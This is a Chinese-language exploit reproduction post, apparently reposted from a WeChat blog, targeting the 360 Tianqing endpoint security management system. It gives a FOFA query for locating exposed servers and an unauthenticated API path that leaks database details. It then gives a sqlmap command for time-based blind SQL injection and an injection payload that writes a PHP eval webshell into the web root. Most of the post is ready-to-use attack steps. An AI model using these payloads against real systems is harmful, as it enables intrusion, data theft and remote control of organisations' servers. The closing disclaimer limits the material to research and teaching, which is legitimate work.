360 天擎终端安全管理系统是奇虎 360 面向政府、军队、金融、制造业、医疗、教育等大型企事业单位推出的以安全防御为核心、以运维管控为重点、以可视化管理为支撑、以可靠服务为保障的全方位终端安全解决方案。为用户构建能够有效抵御已知病毒、0day 漏洞、未知恶意代码和 APT 攻击的新一代终端安全防御体系。
360 天擎系统存在SQL注入,攻击者可以通过漏洞上传木马;同时存在未授权越权访问,造成敏感信息泄露。
FoFa搜索
title=“360新天擎”
漏洞复现
未授权访问漏洞泄露敏感信息,路径/api/dbstat/gettablessize,可直接访问获取数据库相关信息:
前台SQL注入,路径/api/dp/rptsvcsyncpoint?ccid=1,如下:
存在时间盲注:
python sqlmap.py -u "http://xx.xx.xx.xx/api/dp/rptsvcsyncpoint?ccid=1%27%20AND%208443=(SELECT%208443%20FROM%20PG_SLEEP(5))%20AND%20%27%20cYyM%27=%27cYyM" --dbs --random-agent
可利用 SQL 注入写入 Shell:
/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:Program Files (x86)360skylar6www1.php';drop table O;--
原文始发于微信公众号(丁永博的成长日记):360天擎sql注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论